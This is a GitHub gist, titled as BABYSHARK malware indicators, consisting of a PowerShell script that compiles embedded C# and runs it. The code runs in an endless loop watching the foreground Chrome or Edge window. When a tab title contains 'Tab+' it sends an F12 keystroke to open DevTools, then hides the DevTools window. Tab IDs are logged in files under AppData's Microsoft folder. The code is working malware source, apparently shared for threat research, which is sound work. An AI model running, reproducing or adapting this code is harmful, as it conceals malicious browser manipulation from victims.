Skip to content

Instantly share code, notes, and snippets.

@JohnHammond
Created February 23, 2022 18:49
Show Gist options
  • Save JohnHammond/d017e8d3f83093f48bb7188fefa79b00 to your computer and use it in GitHub Desktop.
Save JohnHammond/d017e8d3f83093f48bb7188fefa79b00 to your computer and use it in GitHub Desktop.
BABYSHARK malware indicators of compromise
Add-Type -TypeDefinition @"
using System;
using System.IO;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace g1
{
public static class P1
{
public static void M1()
{
//------------ chrome --------------
string devsign = "Tab+";
StringBuilder tabid_info_chrome = new StringBuilder("nowjohnstart");
StringBuilder tabid_chrome_file = new StringBuilder("",250);
SHGetFolderPath(0,26 ,0,0,tabid_chrome_file);
tabid_chrome_file.Append("\\Microsoft\\tabid_chrome.log");
if(File.Exists(tabid_chrome_file.ToString()))
{
tabid_info_chrome.Clear();
tabid_info_chrome.Append(File.ReadAllText(tabid_chrome_file.ToString()));
}
//------------- edge ---------------
StringBuilder tabid_info_edge = new StringBuilder("nowjohnstart");
StringBuilder tabid_edge_file = new StringBuilder("",250);
SHGetFolderPath(0,26 ,0,0,tabid_edge_file);
tabid_edge_file.Append("\\Microsoft\\tabid_edge.log");
if(File.Exists(tabid_edge_file.ToString()))
{
tabid_info_edge.Clear();
tabid_info_edge.Append(File.ReadAllText(tabid_edge_file.ToString()));
}
while(1==1)
{
//------------- chrome ---------------
if(Process.GetProcessesByName("chrome").Length == 0)
{
tabid_info_chrome.Clear();
tabid_info_chrome.Append("nowjohnstart");
File.Delete(tabid_chrome_file.ToString());
}
//------------- edge ---------------
if(Process.GetProcessesByName("msedge").Length == 0)
{
if(Process.GetProcessesByName("microsoftedge").Length == 0)
{
tabid_info_edge.Clear();
tabid_info_edge.Append("nowjohnstart");
File.Delete(tabid_edge_file.ToString());
}
}
IntPtr hWnd = IntPtr.Zero;
hWnd = GetForegroundWindow();
if (hWnd == IntPtr.Zero)
{
continue;
}
uint PID;
GetWindowThreadProcessId(hWnd,out PID);
Process pp = Process.GetProcessById((int)PID);
string processpath = pp.ProcessName;
StringBuilder title = new StringBuilder(256);
GetWindowText(hWnd, title, 256);
if((processpath.ToString().ToLower() == "chrome") && (title.ToString().ToLower().IndexOf("devtools") == -1))
{
title.Clear();
GetWindowText(hWnd, title, 256);
bool dev_click_flag = false;
if(title.ToString().ToLower().IndexOf(devsign.ToLower()) != -1)
{
dev_click_flag = true;
foreach(string tabid in tabid_info_chrome.ToString().Split(';'))
{
if(title.ToString().ToLower().IndexOf(tabid.ToLower()) != -1)
{
dev_click_flag = false;
Console.WriteLine("exist tabid");
break;
}
}
}
if(dev_click_flag == true)
{
Console.WriteLine("no exist tabid, click");
dev_click_flag = false;
int john_strpos = title.ToString().ToLower().IndexOf(devsign.ToLower());
tabid_info_chrome.Append(';' + title.ToString().Substring(john_strpos));
using (StreamWriter logFile = File.CreateText(tabid_chrome_file.ToString()))
{
logFile.Write(tabid_info_chrome);
}
//PostMessage(hWnd, (int)0x100, (IntPtr)0x7B, (IntPtr)0);
keybd_event((byte)0x7b, 0, (int)(0), 0);
Sleep(10);
keybd_event((byte)0x7b, 0, (int)(2), 0);
//PostMessage(hWnd, (int)0x101, (IntPtr)0x7B, (IntPtr)0);
int times = 0;
bool dev_flag = true;
while((dev_flag == true)&&(times < 700))
{
IntPtr hWnd_dev = GetForegroundWindow();
StringBuilder title_dev = new StringBuilder(256);
GetWindowText(hWnd_dev, title_dev, 256);
if(title_dev.ToString().ToLower().IndexOf("devtools") != -1)
{
Console.WriteLine("hide devtool");
ShowWindow(hWnd_dev, 0);
dev_flag = false;
times = 0;
Sleep(1500);
}
Sleep(10);
times = times + 1;
}
}
Sleep(10);
}
else if((processpath.ToString().ToLower() == "applicationframehost" || processpath.ToString().ToLower() == "microsoftedge" || processpath.ToString().ToLower() == "msedge") && (title.ToString().ToLower().IndexOf("devtools") == -1))
{
title.Clear();
GetWindowText(hWnd, title, 256);
bool dev_click_flag = false;
if(title.ToString().ToLower().IndexOf(devsign.ToLower()) != -1)
{
dev_click_flag = true;
foreach(string tabid in tabid_info_edge.ToString().Split(';'))
{
if(title.ToString().ToLower().IndexOf(tabid.ToLower()) != -1)
{
dev_click_flag = false;
Console.WriteLine("exist tabid");
break;
}
}
}
if(dev_click_flag == true)
{
Console.WriteLine("no exist tabid, click");
dev_click_flag = false;
int john_strpos = title.ToString().ToLower().IndexOf(devsign.ToLower());
tabid_info_edge.Append(';' + title.ToString().Substring(john_strpos));
using (StreamWriter logFile = File.CreateText(tabid_edge_file.ToString()))
{
logFile.Write(tabid_info_edge);
}
//PostMessage(hWnd, (int)0x100, (IntPtr)0x7B, (IntPtr)0);
keybd_event((byte)0x7b, 0, (int)(0), 0);
Sleep(10);
keybd_event((byte)0x7b, 0, (int)(2), 0);
//PostMessage(hWnd, (int)0x101, (IntPtr)0x7B, (IntPtr)0);
int times = 0;
bool dev_flag = true;
while((dev_flag == true)&&(times < 700))
{
IntPtr hWnd_dev = GetForegroundWindow();
StringBuilder title_dev = new StringBuilder(256);
GetWindowText(hWnd_dev, title_dev, 256);
if(title_dev.ToString().ToLower().IndexOf("devtools") != -1)
{
Console.WriteLine("hide devtool");
ShowWindow(hWnd_dev, 0);
dev_flag = false;
times = 0;
Sleep(1500);
}
Sleep(10);
times = times + 1;
}
}
Sleep(10);
}
else
{
Sleep(3000);
Console.WriteLine("BackgroundWindow's not Chrome.exe or Edge.exe");
}
}
}
[DllImport("user32.dll")]static extern bool ShowWindow(IntPtr hW,int nC);
[DllImport("kernel32")]public static extern void Sleep(uint dM);
[DllImport("User32.dll")]public static extern int FindWindow(string sC,string sW);
[DllImport("user32.dll", CharSet = CharSet.Auto)]public static extern int GetWindowText(IntPtr hWnd, StringBuilder title, int size);
[DllImport("user32.dll")]public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);
[DllImport("user32.dll")]public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll")]public static extern bool PostMessage(IntPtr WindowHandle, int Msg, IntPtr wParam, IntPtr lParam);
[DllImport("User32.dll")]
public static extern void keybd_event(byte vk, byte scan, int flags, int extra);
[DllImport("shell32.dll")]
public static extern uint SHGetFolderPath(uint hwnd, uint csidl, uint hToken,uint dwFlags,System.Text.StringBuilder pszSubDir);
}
}
"@ -ReferencedAssemblies System.Windows.Forms;
[g1.P1]::M1();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment